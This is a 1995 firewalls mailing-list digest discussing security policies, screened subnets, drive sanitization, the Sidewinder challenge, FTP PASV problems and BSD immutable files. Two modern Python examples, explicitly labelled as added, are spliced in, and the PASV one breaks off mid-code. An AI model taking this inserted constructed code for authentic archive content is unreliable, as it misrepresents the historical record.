Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

===========================================================================
Stephen,

I have received quite a few responses to my request. I will summarise the responses and post them to the firewalls list once they stop flowing in. This will probably be next week sometime.

Regards,
George Janczuk.
_________________________(Mail message history)_________________________
To: George Janczuk/AMP
cc:
From: I1509527 @ IBMMAIL @ MEMOGWY1
Date: 09/08/95 11:28:00 PM
Subject: RE: SECURITY

Date: Wed, 09 Aug 1995 08:11 -0600 (CST)
From: Stephen.M.Crane@jci.com
Subject: Re: Security
To: auampdrv@ibmmail.com

As an EDP auditor, I also keep an eye on this list and stay on the lookout for others. I would appreciate it if you could forward the addresses of any other useful security resources on the net as people respond.

Thanks in advance,
Stephen Crane

______________________________ Reply Separator _________________________________
Subject: Security
Author: auampdrv@ibmmail.com at Mailhub
Date: 8/8/95 7:52 PM
===========================================================================

Our audit division is interested in gaining access to security based resources (ie: mailing lists). I will be recommending this list (firewalls), best-of-security and risks. I also seem to remember that another SECURITY based list does exist and has been mentioned here before - but I have not been able to find it. Does anyone know of this list? (it may possibly have been a newsgroup). What would other people recommend as an "online" reading list for audit personnel?

Regards,
George Janczuk (auampdrv@ibmmail.com)
AMP Society.
---- End of mail text

From firewalls-owner Thu Aug 10 03:30:07 1995
Date: Thu, 10 Aug 95 12:23:44 +0200
From: ew@senate.be (Emmanuel Willems)
To: firewalls@greatcircle.com
Subject: Re: Sample Security Policy?

John Cougar wrote:

> give away a copy of an organisations Security Policy?!? Not only must
> you be kidding, but also: fat chance. That'd be as negligent as giving
> away company trade secrets!

How's that? This looks a lot like security through obscurity to me!
Emmanuel
--
Emmanuel Willems        e-mail: ew@senate.be

From firewalls-owner Thu Aug 10 05:30:08 1995
From: "meyer"
To: firewalls@greatcircle.com
Date: Thu, 10 Aug 1995 14:27:46 +0000
Subject: screened subnet & cisco performance
Reply-To: meyerd@Mailer.Uni-Marburg.DE

Hi all,

I'm planning to connect our company net to the internet via a screened subnet and a firewall using fwtk or something like that:

    internet -- cisco7000 -- screened subnet -- firewall machine
                                                       I
                                                       I
                                      our router (non cisco/non telnet)
                                                       I
                                                       I
                                                    our net

I'm not the manager of the cisco, but maybe he does what I want him to do.

My Questions:

1. What kind of access-list do I need on the Cisco: incoming or outgoing IP-traffic only to the firewall or both?

2. The cisco uses a switch processor which offers more speed than the routing processor. Does one of the access-lists (incoming or outgoing) affect or disable this kind of fast switching, so that the throughput of the entire box is slowing down, not only the "screened subnet port"?

3. Would you take responsibility for the firewall, if you are not sure, that the cisco is locked in the best way? Or would you put another two-port-router that is under your management between the cisco and the screened subnet?
Thanks

Dirk

-----------------------------------------------------------------
Dirk A. Meyer                                 meyerd@mailer.uni-marburg.de
Klinikum der Philipps-Universitaet Marburg    Tel.xx49-6421-28-6291
Med. Informatik                               Fax.-------------8921
Bunsenstr. 3
D-35033 Marburg/Lahn
-----------------------------------------------------------------

From firewalls-owner Thu Aug 10 06:05:37 1995
To: firewalls-digest
From: Warren Moore
Date: 10 Aug 95 8:10:51 EDT
Subject: Re: Sample Security Policy?

John Cougar writes:

>give away a copy of an organisations Security Policy?!? Not only must
>you be kidding, but also: fat chance. That'd be as negligent as giving
>away company trade secrets!

I may have missed something here, and certainly not to start a war, but that's wrong.
Copies of real, in-use, corporate security policies are available from many different sources--starting with the Computer Security Institute's old "Computer Security Handbook," and the MIS Training Institute's "Information Security Resource Manual." (IBM, First American National Bank, yadatayada). In some cases they're slightly sanitized, but the base document is there.

And, there's really no reason not to provide samples (if management approves), simply because a true Corporate Security Policy statement isn't going to say very much anyway--it should be nothing more than a short statement of what your corporate entity's leaders expect.

Perhaps it's splitting hairs, but many people don't understand (and often confuse) the base meanings of the words "Policy," "Standards," "Guidelines," and "Procedures." If you use the definitions below, there's no reason not to let people know your policy, but quite a few to guard your standards, guidelines, and procedures closely.

Policy: A statement of *what* management expects; not how those expectations will be met.

Standard(s): The criteria against which results are to be judged.

Guideline(s): Items that *should* be considered when a particular subject is studied and analyzed. Guidelines are not always an exhaustive list, nor are they always applicable to all things in all cases.

Procedure(s): A detailed step-by-step description of *how* a job is done, defining *who* does *what*. Procedures are written to support policy, meet standards, use guidelines when necessary, and *show the way to do something.*

Warren S. Moore, CISSP
Information Security Specialist
Cincinnati Bell Information Systems Inc.
My Opinions Are Mine Only -- Who Else Would Claim Them?
From firewalls-owner Thu Aug 10 06:30:33 1995
Date: Thu, 10 Aug 1995 08:50:02 -0400 (EDT)
From: Alan Dowd
To: John Cougar
Cc: snd1pmf@snd10.med.navy.mil, firewalls@GreatCircle.com
Subject: Re: Sample Security Policy?
In-Reply-To: <199508092328.QAA23996@miles.greatcircle.com>

On Thu, 10 Aug 1995, John Cougar wrote:

> Hey Pat
>
> give away a copy of an organisations Security Policy?!? Not only must
> you be kidding, but also: fat chance. That'd be as negligent as giving
> away company trade secrets!

NOT! The security policy can be as simple as "all that is not specifically permitted is forbidden." It's not the policy, it's how you enforce it that _may_ need protection.

Consider a policy for passwords:

1) all login accounts must have passwords
2) all passwords must be at least 6 characters
3) all passwords must contain at least
   a) 1 upper case alphabetic character
   b) 1 lower case alphabetic character
   c) 1 non-alphabetic character

What advantage does this give a potential intruder? What advantage does it give the user? the administrator? (Rhetorical questions; solutions are left to the student.)
Now if you reveal the enforcement mechanism and make the password file available for public scrutiny, then you _may_ be giving something away, but if all you reveal is the policy, you give away nothing.

>
> You can, however, get more than enough info. from the RFC 1244, available
> at any number of archives. Try an archie server near you someplace.
>

Here are a few Web sites of interest:

http://ciac.llnl.gov/cstc/CIACHome.html
http://www.isse.gmu.edu:80/~gmuisi
http://hightop.nrl.navy.mil
http://csrc.ncsl.nist.gov

The last one, the National Institute of Standards and Technology, has a separate topic for policies. It can also be reached by anonymous ftp.

> You'll also want copies of the DoD Orange Book,

... to prop up the corner of a wobbly monitor. The Orange Book has absolutely nothing to say about writing policies - it's a set of evaluation criteria for trusted systems. For the record, it is available, for the asking (as is the whole Rainbow series), from:

INFOSEC Awareness Division
ATTN: X711/IOAC
Ft. George G. Meade, MD 20755-6000 USA
+1 410 766 8729

(This latter information changes at unpredictable intervals. Security by obscurity at the NSA?) Electronic copies also exist in many on-line archives.

Regards,
Al Dowd
Unix Network Security Analyst
Management Systems Applications, Inc.
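An added example, not from Al Dowd's post or from any product on this list: the three-rule password policy quoted above written down as an enforcement check, run over constructed passwd-style lines and candidate passwords. The shell names used to recognise non-login accounts are an assumption of this example, not something the post specifies.

```python
"""Added example: the password policy quoted in the message, as code.

The policy itself is public (that is the point of the post); this script
is one enforcement side of it, run over constructed data.  Rules 2 and 3
are checked per candidate password; rule 1 is checked by auditing
passwd(5)-style lines for login accounts with no password set.
"""
import re

MIN_LENGTH = 6  # rule 2 of the quoted policy


def policy_violations(password: str) -> list:
    """Return the rule labels a candidate password breaks (empty == ok)."""
    violations = []
    if len(password) < MIN_LENGTH:
        violations.append("2")            # shorter than 6 characters
    if not re.search(r"[A-Z]", password):
        violations.append("3a")           # no upper case alphabetic
    if not re.search(r"[a-z]", password):
        violations.append("3b")           # no lower case alphabetic
    if not re.search(r"[^A-Za-z]", password):
        violations.append("3c")           # no non-alphabetic character
    return violations


# Assumption of this example: these conventional shell names mark an
# account that cannot log in, so rule 1 does not apply to it.
NON_LOGIN_SHELLS = {"/bin/false", "/sbin/nologin", "/usr/sbin/nologin"}


def accounts_without_passwords(passwd_lines) -> list:
    """Rule 1: return login accounts whose password field is empty.

    Input is passwd(5)-style text, name:passwd:uid:gid:gecos:dir:shell.
    A line that cannot be parsed is reported as "<malformed>" rather than
    skipped, because an entry the audit cannot read cannot be trusted.
    """
    offenders = []
    for raw in passwd_lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            offenders.append("<malformed>")
            continue
        name, pw_field, shell = fields[0], fields[1], fields[6]
        if shell in NON_LOGIN_SHELLS:
            continue                      # not a login account
        if pw_field == "":
            offenders.append(name)        # rule 1 violated
    return offenders


# Constructed sample data; not real accounts, hashes or passwords.
SAMPLE_PASSWD = [
    "root:x:0:0:root:/root:/bin/sh",
    "alice:x:1001:1001:Alice:/home/alice:/bin/sh",
    "guest::1002:1002:Guest:/home/guest:/bin/sh",   # empty password field
    "daemon::1:1:daemon:/usr/sbin:/sbin/nologin",   # not a login account
    "broken:x:1003",                                # unparsable entry
]

SAMPLE_PASSWORDS = ["Secret7", "secret7", "SECRET7", "Secrets", "Se7", "aaaaaa"]

if __name__ == "__main__":
    print("rule 1 offenders:", accounts_without_passwords(SAMPLE_PASSWD))
    for pw in SAMPLE_PASSWORDS:
        print("%-8s -> %s" % (pw, ", ".join(policy_violations(pw)) or "ok"))
```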
From firewalls-owner Thu Aug 10 06:36:33 1995
From: "Tucker, R., SrA, 28CS/SCSNS"
To: "'firewalls-owner'"
Subject: Sanitizing SCSI Drives
Date: Thu, 10 Aug 95 06:37:00 PDT

Ok folks, I guess it's time to fess up so I can take my foot out of my mouth now. :*)

As far as sanitizing SCSI drives using Norton Utilities' Wipedisk. It *IS* still approved for TS, but on MS-DOS systems on ***MILITARY COMPUTERS ONLY.*** If you're a civilian contractor, there are different guidelines you have to follow, and they don't have provisions for clearing TS off of your systems. However, this has nothing to do with hardware and being able to pull information back up from the system, and everything to do with administrative procedures BEFORE you need to sanitize.

The sloppy drive head positioning deals with floppy drives, and there is NO WAY, barring destruction, to declassify a floppy disk. However, HD's, unless the head slips (and you would know when it fails) can be declassified in this manner. This includes taking into consideration taking the platters apart, once overwritten enough times, the information is gone.
(However, it's also been my past experience that sooner or later, someone will invent something that will nullify this statement, since whenever someone says, "It can't be done." there's always someone doing it.)

I know this means there's a double standard between military and civilian requirements, but please don't flame me for it. :*) Part of the problem is ISM and NISPOM are both Industrial Security program documents. While they DO APPLY, they do not necessarily apply as far as Computer Security is concerned... but you still have to follow them. This is what's known as bureaucracy and politics at work. Industrial Security is governed at the national level by former Security Police (SP) personnel, who haven't got a clue as to computer requirements. (I think it's a prerequisite for running ANY national level program, however, so I'm not trying to flame them.) Since they have no jurisdiction in computer requirements, the only changes they can make to national computer security mandates is to make them more stringent. (You can legally add to a requirement, but you can't make them less stringent without a waiver from the responsible office.) In short, if you're a civilian with classified on your computer, you have to abide by the NISPOM. Government and military personnel get to use the computer security guidelines. < Neah, neah, neah. :*P >

Also, Wipedisk is only approved for MS-DOS systems, we have nothing approved for any other system for any level of classified, besides utilizing a sledgehammer and sandpaper. (Which, cost notwithstanding, is very fun... you should try it sometime.) Because the discussion was SCSI, I assumed (along with the results of assuming, with an emphasis on the *me* portion) that everyone was talking about MS-DOS, even knowing that almost all of you are using Unix based systems. (Kind of the equivalent of describing the new Wonder Zap! flea collar at a dog show, and forgetting to mention it only works on cats.)
:*( And, last but not least, because I've been shown *VERY* wrong on this one, *DO NOT* degauss a hard drive unless you know, or know someone who knows, what the heck you are doing! This is in regards to zapping your servo info with HD's using voice coil heads. I've spoken to my computer maintenance folks, and they said it's very likely, but they weren't sure (understandable, since we don't normally degauss our HD's.) However, I would like to point out that I do know someone who has done it, and survived, but he retired and moved recently, so I won't be able to contact him to find out how he did it until this thread is forgotten. I wish I could provide technical details on this one (esp. since this is a technical list) but I'm not too knowledgeable on technical matters (I just play one on TV :*) ) but until I find out how he did it, please don't follow my advice by degaussing your HD. Mr. Lymn has stated that maybe he (my friend who zapped his HD) got lucky, or something, but like I said, unless you know someone who can rebuild HD's from scratch, please don't try this one at home... just in case.

So, to stop wasting any more bandwidth than I have to...

1. Wipedisk is ONLY for government and military computers, and only for MS-DOS systems (but it *IS* for TS).
2. Civilians play by a different set of rules (with extra requirements) for the same information.
3. Mr. Lymn is technically knowledgeable, I'm not. Don't degauss your hard drive unless you're a masochist. (Or a sadist who hates his/her computer maintenance folks.)

Thanks for all the help in pointing out my mistakes, and I apologize for the misinformation I presented in my original post. (No, I'm not being smart... if people don't point out my mistakes, I can't learn. Once learning stops, it's time to take me out back and shoot me.)

Thanks,
Robert C. Tucker

From firewalls-owner Thu Aug 10 07:00:54 1995
From: Atkinson-K@smtpgw.nctsw.navy.mil
Date: Thu, 10 Aug 1995 09:54:40 -0400
Subject: Encrypted ftp connections
To: firewalls@GreatCircle.com

Lyndon David wrote:

>I have been tasked with setting up an ftp server to
>communicate with a handful of business partners. We
>wish to have the ability for our partners to be able
>to send and retrieve files from our server. Due to the
>nature of the data the data must be encrypted as it passes
>over the Internet and strong authentication must be used
>when they connect.

>This is a commercial project and the data will cross
>International boundaries, for this reason I do not want
>to use encryption technology such as pgp as some of the
>countries will have problems with this.

>Does anyone know of a hardware solution that can operate
>between one local machine and 5 or 6 remote machines?

The Message Security Protocol (don't recall the International Standard name for it) will provide the strong authentication and one to many requirements you have, but only for messages.
In an international environment, you will have problems with just about any encryption capability you choose.

>If encryption of the data before transmission is mandated
>what commercial encryption can be used that will be
>acceptable across International borders and can anyone
>think of a method where if someone forgot to encrypt the
>data before transmission this would be caught and the
>transfer stopped?

There are Guards that will be coming available that will prevent unencrypted information from leaving an enclave and passing over a Network.

------------------------------

From firewalls-owner Thu Aug 10 08:23:51 1995
From: "Marcus J. Ranum"
Subject: Re: s[id]ewinder
To: smith@sctc.com (Rick Smith)
Date: Thu, 10 Aug 1995 10:28:54 -0400 (EDT)
Cc: firewalls@GreatCircle.COM, smith@sctc.com
In-Reply-To: <199508092131.QAA05680@shade.sctc.com> from "Rick Smith" at Aug 9, 95 04:31:17 pm
Reply-To: mjr@iwi.com

Rick Smith writes:

>This is the weird part about having a challenge site. There are almost
>as many rumors of successful attacks as there are unsuccessful attacks
>(thousands, it would seem).

That's one of the hazards of doing bogus challenges. My heart bleeds.
Gould had the same kind of problem with their "break our C2!" challenge: someone social engineered it and they refused to pay off and the whole thing became an embarrassment. You risk the same kind of thing with the Sidewinder challenge. That's your decision and your problem, though.

>The Challenge is to break through the firewall and extract a message
>stored on the challenge site's LAN. I've never seen anyone broadcast
>a copy of the message

Question: Will SCC pay out if the message is broadcast REGARDLESS of the means by which it is discovered? Careful how you answer. :)

mjr.

From firewalls-owner Thu Aug 10 08:24:23 1995
From: Danny Cox
Date: Thu, 10 Aug 1995 15:50:22 +0100
To: firewalls@greatcircle.com
Subject: Running ISDN links using PPP - where should they go ?

The subject says it all basically. It is critical to our operations here that we have some ISDN lines up to other sites. Given that we have a firewall running SOCKS here I want to keep these links outside our protected network. How have any of you done this ? Do you put it on the bastion host? I've only one, twin-home host with no CISCOs etc.
Cheers all,

Danny

From firewalls-owner Thu Aug 10 08:54:38 1995
From: "Chambers, M.A."
To: "'firewalls@GreatCircle.COM'"
Subject: Are there any NT Firewalls?
Date: Thu, 10 Aug 95 09:57:00 PDT

I have been watching this discussion for the past few months. During that time I haven't seen much of a discussion on any firewall products for NT. Does anyone know of a firewall product that will run under NT? We are looking for secure FTP and WWW connections. We are doing packet filtering with our routers, but we would like a more secure environment. Any rumors or facts about NT products would be appreciated.

Thanks

MC
Chambers_Matt@Essexgroup.Com

The following binary file has been uuencoded to ensure successful transmission. Use UUDECODE to extract.
From: "Marcus J. Ranum"
Subject: Re: Multilevel Security is good for firewalls
To: mcr@milkyway.com (Michael Richardson)
Date: Thu, 10 Aug 1995 11:43:58 -0400 (EDT)
Cc: firewalls@GreatCircle.COM
In-Reply-To: <40bfkn$1vo@metis.milkyway.com> from "Michael Richardson" at Aug 9, 95 07:16:39 pm
Reply-To: mjr@iwi.com
> Firewalls are *NOT* general purpose computing engines. Padgett
>has suggested building firewalls out of 386SXs: one for each proxy
>service!

There's an outfit that builds a firewall running on DOS. When I first heard of it, I thought the idea was ridiculous, but in retrospect it's actually a really clever idea! There's no sendmail to worry about ("multitasking? Huh?") no network daemons, no NFS, no spending hours vetting your UNIX config to see what nonsense the vendor left there, etc, etc. If the firewall process crashes, the system instantly becomes inoperative. Pretty clever, really. Basically, you accept the fact that the firewall is a special purpose machine and treat it accordingly. I'd rather run DOS than B1, and frankly, I suspect a DOS box running a single program that just manages IP firewalling is a hell of a lot harder to break into than a CMW or some kind of UNIX box running B1. (and a little cheaper and easier to manage)

mjr.

From firewalls-owner Thu Aug 10 09:26:43 1995
From: Maurice.Yergeau@Toro.Com
Date: Thursday, 10 August 1995 9:08am CT
To: firewalls@greatcircle.com
Subject: anyone using NetGate 2.0 from smallworks

I am looking at NetGate by SmallWorks to be used on a sparc 1 with 2 network cards.
Has anyone had experience with this product or an older release. Please send comments directly to me.

From firewalls-owner Thu Aug 10 09:45:12 1995
From: "Marcus J. Ranum"
Subject: Re: Sidewinder challenge comments
To: smith@sctc.com (Rick Smith)
Date: Thu, 10 Aug 1995 12:04:51 -0400 (EDT)
Cc: firewalls@GreatCircle.COM, smith@sctc.com
In-Reply-To: <199508092016.PAA26323@shade.sctc.com> from "Rick Smith" at Aug 9, 95 03:16:51 pm
Reply-To: mjr@iwi.com

Rick Smith writes:

>There really haven't been that many attacks that are interesting from
>a Firewalls standpoint. To paraphrase the Sidewinder FAQ, about 1% of
>the attacks are really interesting, and most of those appear to come
>from BSDI wizards probing our Type Enforcement implementation. Maybe
>10% are competent but predictable attacks based on known weaknesses
>like those published Cheswick & Bellovin. The rest are people who try
>the easier things mentioned in C&B's "bombs" or in "Unix for Dummies."

This basically confirms people's earlier observations that the benefit of such "challenges" is primarily marketing and not technical.

mjr.
From firewalls-owner Thu Aug 10 09:48:36 1995
From: "Chris Brenton"
Date: Thu, 10 Aug 95 10:17:34 EST
Message-Id: <9508101017.AA16424@herne.newsedge.com>
Subject: Re: sleazewinder
Original-From: Frederick M Avolio
Original-Date: Wed, 09 Aug 95 15:19:58 -0400

> > Where is OUR benefit from all the free work that the community at large has
> > given you?
>
> Well... You can look at it sort of like being a field test site. What
> are the benefits? I mean, no one pays you to be a field test site for
> a product. You can figure that the benefits are the same as if you
> were a test site:

Every time I've been a test site I've been able to keep and continue using the product when I was done. :)

From firewalls-owner Thu Aug 10 10:11:57 1995
From: clh@ptech.com (Charles L. Hutson)
Message-Id: <9508101528.AA21060@nexus.ptech.com>
Subject: Netscape's FTP through a Firewall
To: firewalls@greatcircle.com
Date: Thu, 10 Aug 95 11:27:18 EDT

I'm having a problem using Netscape to FTP through my Firewall-1 firewall. I've done quite a bit of testing and research and have figured out that it's because Netscape's version of ftp adheres to the specifications of RFC 1579. This RFC states that instead of doing a PORT command to tell the ftp server what port to open a data connection on, it does a PASV command. The following quote is from the above RFC:

    Fortunately, the necessary mechanisms already exist in the protocol. If the
    client sends a PASV command, the server will do a passive TCP open on some
    random port, and inform the client of the port number. The client can then
    do an active open to establish the connection.

This is the part that confuses me. If the server is going to inform my client of the port number "on some random port",

1) How am I going to know which port to listen on to get this critical information? It seems like my ftp client would have to be frantically scanning the entire range above 1024 to get this information.

2) Isn't this going to force me to leave the entire range above 1024 wide open in my firewall configuration?

As it stands, I can't FTP through Netscape because my firewall blocks that incoming random packet. Can anyone provide any suggestions?

--
Charles L. Hutson, clh@ptech.com
Systems Engineer
Technical Services Division
Piedmont Technology Group
Phone 704.523.2400
Fax 704.523.7764

From firewalls-owner Thu Aug 10 10:22:51 1995
From: "Marcus J. Ranum"
Message-Id: <199508101559.LAA13701@switchblade.iwi.com>
Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls
To: mdr@vodka.sse.att.com
Date: Thu, 10 Aug 1995 11:59:11 -0400 (EDT)
Cc: steveg@cseic.saic.com, firewalls@GreatCircle.COM
In-Reply-To: <9508092126.AA00776@ig1.att.att.com> from "mdr@vodka.sse.att.com" at Aug 9, 95 05:27:59 pm
Organization: Information Works! Inc, Baltimore, MD

mdr@vodka.sse.att.com writes:
> I don't know how BSD implements the sappnd or schg features for files.
> But if it involves permission bits or other data in the inode of the
> file, then it may be possible for a root user to change the inode's
> contents by seeking to the appropriate spot on the block or raw device
> and updating the inode. That may sound hard to do, but it's not.

The immutable bit stuff is pretty cleanly implemented and makes a lot of sense.
Once you've put the system into multiuser mode, write access is disabled to the raw and cooked devices -- so forget using fsdb to pop the inode. Ditto kmem -- used to be you could pop the version of an inode in the kernel inode cache and not even have to touch the disk. :)

> Alternatively, root can patch /unix or the running system image to
> ignore the bits wherever they may be stored. Basically just replace
> part of the code in the function that does the check with an early
> return or jump or register set.

[It's /bsd, not /unix. UNIX is a trademark of somebody or other and they used to sue people over that distinction. :)]

Patching the running system image usually requires write access to /dev/kmem, etc, which is blocked in multiuser mode. I suppose you theoretically might manage to find a way of overrunning some part of the kernel to implement a "patch" to it, but the traditional tricks are blocked off. Patching the buffer cache, ditto. Patching the on-disk copy of the kernel would require writing the file, which, presumably, is something you'd want to keep immutable.

The idea of immutable files is pretty sound, and the guys who did it have thought it through pretty thoroughly.

mjr.

From firewalls-owner Thu Aug 10 10:23:28 1995
From: "Bryan D. Boyle"
Message-Id: <9508101148.ZM18768@maverick.erenj.com>
Date: Thu, 10 Aug 1995 11:48:56 -0400
In-Reply-To: "Marcus J. Ranum" "Re: s[id]ewinder" (Aug 10, 10:28am)
References: <199508101428.KAA13372@switchblade.iwi.com>
To: mjr@iwi.com
Subject: Re: s[id]ewinder
Cc: firewalls@greatcircle.com

On Aug 10, 10:28am, Marcus J. Ranum wrote:
> Subject: Re: s[id]ewinder
> Rick Smith writes:
> > This is the weird part about having a challenge site. There are almost
> > as many rumors of successful attacks as there are unsuccessful attacks
> > (thousands, it would seem).
>
> That's one of the hazards of doing bogus challenges. My heart
> bleeds.
>
> Gould had the same kind of problem with their "break our C2!"
> challenge: someone social engineered it and they refused to pay off
> and the whole thing became an embarrassment. You risk the same kind of
> thing with the Sidewinder challenge. That's your decision and your
> problem, though.
>
> > The Challenge is to break through the firewall and extract a message
> > stored on the challenge site's LAN. I've never seen anyone broadcast
> > a copy of the message
>
> Question:
> Will SCC pay out if the message is broadcast REGARDLESS of the
> means by which it is discovered? Careful how you answer. :)

Of course not. The fact that no one has publicly broken it indicates:

1) no one really cares and has other things to do with limited time.

2) The challenge is that there really is no message, and finding that out is the key.

3) the people you are trying to protect against aren't interested in proving a company's marketing claims.

Reminds me of the build up to SATAN/SANTA and the bubble that burst. Not being broken does not, ipso facto, indicate that the system is secure. It can also indicate that there was not a concerted effort to do so.

But, I guess, there is no limit to the hype that will come out of marcom types and plaid-suited sales strategists...:)

--
Bryan D. Boyle           | "It's when you think you've understood a problem
#include                 | thoroughly that you are in real trouble..."
EMAIL: bdboyle@erenj.com |                                -Pavel Chichikov

From firewalls-owner Thu Aug 10 10:59:44 1995
From: peter@nmti.com (Peter da Silva)
Message-Id: <9508101511.AA13248@sonic.nmti.com.nmti.com>
Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls
To: mdr@vodka.sse.att.com
Date: Thu, 10 Aug 1995 10:11:45 -0500 (CDT)
Cc: steveg@cseic.saic.com, firewalls@GreatCircle.COM
In-Reply-To: <9508092126.AA00776@ig1.att.att.com> from "mdr@vodka.sse.att.com" at Aug 9, 95 05:27:59 pm

> I don't know how BSD implements the sappnd or schg features for files.
> But if it involves permission bits or other data in the inode of the
> file, then it may be possible for a root user to change the inode's
> contents by seeking to the appropriate spot on the block or raw device
> and updating the inode. That may sound hard to do, but it's not.
I think it is if the raw device is marked immutable.

> Alternatively, root can patch /unix or the running system image to
> ignore the bits wherever they may be stored.

Unless /unix is immutable.

> Any BSD gurus out there?

Lots. Ask on the FreeBSD and NetBSD mailing lists. (I'm nowise a guru, though I did do some work on 386BSD and FreeBSD, mostly applications level hardening and improving the logging from ftpd)

From firewalls-owner Thu Aug 10 11:08:10 1995
From: JET@VAX8.CFSAN.FDA.GOV
Date: Thu, 10 Aug 1995 12:44:27 -0400 (EDT)
Subject: Re: Multilevel Security is good for firewalls
To: mjr@iwi.com
Cc: firewalls@greatcircle.com
Message-id: <01HTWPU9PCW2000305@VAX8.CFSAN.FDA.GOV>

> There's an outfit that builds a firewall running on DOS.
> When I first heard of it, I thought the idea was ridiculous, but
> in retrospect it's actually a really clever idea! There's no sendmail
> to worry about ("multitasking? Huh?") no network daemons, no NFS,
> no spending hours vetting your UNIX config to see what nonsense
> the vendor left there, etc, etc. If the firewall process crashes,
> the system instantly becomes inoperative. Pretty clever, really.
> Basically, you accept the fact that the firewall is a special purpose
> machine and treat it accordingly.
> I'd rather run DOS than B1, and frankly, I suspect a DOS
> box running a single program that just manages IP firewalling is a
> hell of a lot harder to break into than a CMW or some kind of UNIX
> box running B1. (and a little cheaper and easier to manage)
>
> mjr.

...and the source is easy on the eyes!

--John

From firewalls-owner Thu Aug 10 11:09:52 1995
From: phoenix@clark.net
Date: Thu, 10 Aug 1995 12:21:12 -0400 (EDT)
To: "Chambers, M.A."
Cc: "'firewalls@GreatCircle.COM'"
Subject: Re: Are there any NT Firewalls?
In-Reply-To: <302A39A4@ESSEXGROUP.COM>

Funny... I seem to recall a substantial discussion on firewalls and Windows NT. I believe it was a month or two ago. In order to not go through all of this again, please look through the firewalls LISTSERV archive. If you have questions above and beyond what was previously discussed, fire away. However, it sounds like a repeat/rehash of what has already been discussed.

On Thu, 10 Aug 1995, Chambers, M.A. wrote:
>
> I have been watching this discussion for the past few months. During that
> time I haven't seen much of a discussion on any firewall products for NT.
> Does anyone know of a firewall product that will run under NT? We are
> looking for secure FTP and WWW connections.
> We are doing packet filtering with our routers, but we would like a more
> secure environment.
> Any rumors or facts about NT products would be appreciated.
>
> Thanks
> MC
>
> Chambers_Matt@Essexgroup.Com
> [snip, snip -- junk deleted]

phoenix@clark.net

From firewalls-owner Thu Aug 10 11:35:38 1995
From: clh@ptech.com (Charles L. Hutson)
Message-Id: <9508101742.AA22534@nexus.ptech.com>
Subject: Re: Netscape's FTP through a Firewall (fwd)
To: firewalls@greatcircle.com
Date: Thu, 10 Aug 95 13:41:38 EDT

Well, this leads to another problem.... I am using a proxy..... it's Netscape's Proxy Server and it appears to implement ftp the same way. :|

| > Can anyone provide any suggestions ...
|
| Run a proxy, like CERN, on your firewall.
|
| /jordan

--
Charles L. Hutson, clh@ptech.com
Systems Engineer
Technical Services Division
Piedmont Technology Group
Phone 704.523.2400
Fax 704.523.7764

From firewalls-owner Thu Aug 10 11:46:13 1995
From: "Chris Brenton"
Date: Thu, 10 Aug 95 14:08:51 EST
Message-Id: <9508101408.AA16324@herne.newsedge.com>
Subject: Re: Multilevel Security is good for firewalls

In reply to:
> There's an outfit that builds a firewall running on DOS.
> When I first heard of it, I thought the idea was ridiculous, but
> in retrospect it's actually a really clever idea! There's no sendmail
> to worry about ("multitasking? Huh?") no network daemons, no NFS,
> no spending hours vetting your UNIX config to see what nonsense
> the vendor left there, etc, etc. If the firewall process crashes,
> the system instantly becomes inoperative. Pretty clever, really.
> Basically, you accept the fact that the firewall is a special purpose
> machine and treat it accordingly.
> I'd rather run DOS than B1, and frankly, I suspect a DOS
> box running a single program that just manages IP firewalling is a
> hell of a lot harder to break into than a CMW or some kind of UNIX
> box running B1. (and a little cheaper and easier to manage)

Any capacity or speed specs on this?
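The PASV exchange that Charles Hutson's two posts earlier in this digest ask about, as an added example written for this archive (not code from any poster or product): the server's 227 reply arrives on the control connection the client already has open and names the host and port, so the client never listens or scans for it; it makes an outbound active open to that port. The two policy checks (advertised host must equal the control peer, port must be unprivileged) are this example's own assumed policy, and every address and reply is constructed.

```python
import re
from dataclasses import dataclass

# Matches the six comma-separated fields of an RFC 959 "227 Entering Passive
# Mode (h1,h2,h3,h4,p1,p2)" reply.  Servers vary in the text around the
# parentheses, so only the digits are relied on.
_PASV_FIELDS = re.compile(r"(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})")


@dataclass(frozen=True)
class PassiveTarget:
    """Where the client must open its outbound data connection."""
    host: str
    port: int


def parse_pasv_reply(reply: str) -> PassiveTarget:
    """Extract host and port from the server's 227 reply on the control channel.

    The port is delivered in-band, before the data connection exists, so the
    client needs no listening socket and no port scan to learn it.
    """
    reply = reply.strip()
    if not reply.startswith("227"):
        raise ValueError(f"expected a 227 reply, got: {reply!r}")
    m = _PASV_FIELDS.search(reply)
    if m is None:
        raise ValueError(f"227 reply carries no h1,h2,h3,h4,p1,p2 fields: {reply!r}")
    fields = [int(f) for f in m.groups()]
    if any(f > 255 for f in fields):
        raise ValueError(f"field out of range in PASV reply: {reply!r}")
    host = ".".join(str(f) for f in fields[:4])
    port = fields[4] * 256 + fields[5]   # RFC 959 encodes the port as two bytes
    if port == 0:
        raise ValueError("PASV reply advertises port 0")
    return PassiveTarget(host, port)


def check_data_connection(target: PassiveTarget, control_peer: str) -> tuple:
    """Sanity checks a proxy or stateful filter can apply before permitting the
    outbound data connection.  Assumed policy for this example, not the
    behaviour of any particular product:
      * the advertised host must be the server we already talk to on the
        control connection, otherwise the client is being told to connect
        somewhere else entirely;
      * the advertised port must be unprivileged (>= 1024), the range a
        server is expected to pick its passive port from.
    """
    if target.host != control_peer:
        return False, f"advertised host {target.host} differs from control peer {control_peer}"
    if target.port < 1024:
        return False, f"advertised port {target.port} is a privileged port"
    return True, f"allow outbound TCP to {target.host}:{target.port}"


def passive_exchange(control_peer: str, server_reply: str) -> dict:
    """Walk through the client side of the PASV exchange quoted from RFC 1579."""
    transcript = ["C: PASV", f"S: {server_reply.strip()}"]
    try:
        target = parse_pasv_reply(server_reply)
    except ValueError as exc:
        return {"allowed": False, "reason": str(exc), "transcript": transcript}
    allowed, reason = check_data_connection(target, control_peer)
    if allowed:
        transcript.append(f"C: <active open to {target.host}:{target.port}>")
        transcript.append("C: RETR file.txt")
    return {"allowed": allowed, "reason": reason, "target": target, "transcript": transcript}


if __name__ == "__main__":
    # Constructed replies; 192.0.2.0/24 and 198.51.100.0/24 are documentation ranges.
    peer = "192.0.2.10"
    for reply in (
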